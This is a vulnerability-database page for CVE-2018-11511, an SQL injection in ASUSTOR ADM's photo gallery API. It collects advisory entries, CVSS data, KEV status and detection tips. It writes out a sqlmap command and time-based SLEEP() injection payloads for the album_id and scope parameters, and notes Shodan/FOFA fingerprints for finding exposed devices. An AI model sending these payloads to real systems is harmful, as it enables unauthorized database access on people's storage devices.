CVE-2018-11511
published 2018-08-16CVE-2018-11511: The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope'…
PriorityP179critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
11.18%
95.4th percentile
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asustor | asustor_data_master | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsqlmap -u "https://<TARGET>/photo-gallery/api/album/tree_lists/" --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" --random-agent --risk=2 --dbms=mysql↗
commandkeyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2↗
commandalbum_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
commandkeyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
- →Detect time-based blind SQLi attempts against the album_id POST parameter at /photo-gallery/api/album/tree_lists/ — look for SLEEP() payloads in POST body with duration >= 9 seconds response time. ↗
- →Detect time-based blind SQLi attempts against the scope POST parameter at /photo-gallery/api/photo/search/ — look for SLEEP() payloads in POST body. ↗
- →Boolean-based blind SQLi can also be detected via AND clause payloads such as 'AND 4644=4644' in the album_id parameter. ↗
- →Use FOFA/Shodan fingerprinting to identify exposed ASUSTOR ADM instances as targets: search for body containing 'ASUSTOR' with icon_hash '1678170702'.
- ·Both vulnerable endpoints (/photo-gallery/api/album/tree_lists/ and /photo-gallery/api/photo/search/) require POST requests with Content-Type: application/x-www-form-urlencoded; GET-based detection will miss this vulnerability.
- ·The vulnerability affects ASUSTOR ADM 3.1.0.RFQ3 and all previous builds; the RCE (CVE-2018-11510) was patched in ADM 3.1.3 on May 31, 2018, but the SQLi (CVE-2018-11511) should also be addressed by upgrading to ADM 3.1.3. ↗
- ·The SQLi is blind (both boolean-based and time-based); no direct error output is returned, making detection reliant on response timing or differential boolean responses rather than error messages. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8ccp-76j3-r8wf: The tree list functionality in the photo gallery application in ASUSTOR ADM 3
ghsa_unreviewed·2022-05-14
CVE-2018-11511 [CRITICAL] CWE-89 GHSA-8ccp-76j3-r8wf: The tree list functionality in the photo gallery application in ASUSTOR ADM 3
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
VulnCheck
asustor asustor_data_master Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-11511 [CRITICAL] asustor asustor_data_master Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
asustor asustor_data_master Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
Affected: asustor asustor_data_master
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://app.crowdsec.net/cti/cve-explorer/CVE-2018-11511; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/
No detection rules found.
Exploit-DB
ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
exploitdb·2018-08-15·CVSS 9.8
CVE-2018-11511 [CRITICAL] ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
---
Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds
Vendor - https://www.asustor.com/
Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf
Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from
multiple critical vulnerabilities. The vulnerabilities were submitted
to Asustor in January and February 2018. Several follow-up requests
were made in an attempt to obtain vendor acknowledgement, however no
correspondance was ever received. Nevertheless, the vendor did patch
the RCE issue in the 3.1.3 ADM release on May 31, 2018.
Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3.
CVE-2018-11510
Remote Command Execution (Unauthenticated)
CWE-78 - Improper Neutr
Nuclei
ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
nuclei·CVSS 9.8
CVE-2018-11511 [CRITICAL] ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.
Template:
id: CVE-2018-11511
info:
name: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
author: ritikchaddha
severity: critical
description: |
ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further
No writeups or analysis indexed.
http://packetstormsecurity.com/files/148919/ASUSTOR-NAS-ADM-3.1.0-Remote-Command-Execution-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/45200/http://packetstormsecurity.com/files/148919/ASUSTOR-NAS-ADM-3.1.0-Remote-Command-Execution-SQL-Injection.htmlhttps://www.exploit-db.com/exploits/45200/
2018-08-16
Published
Exploited in the wild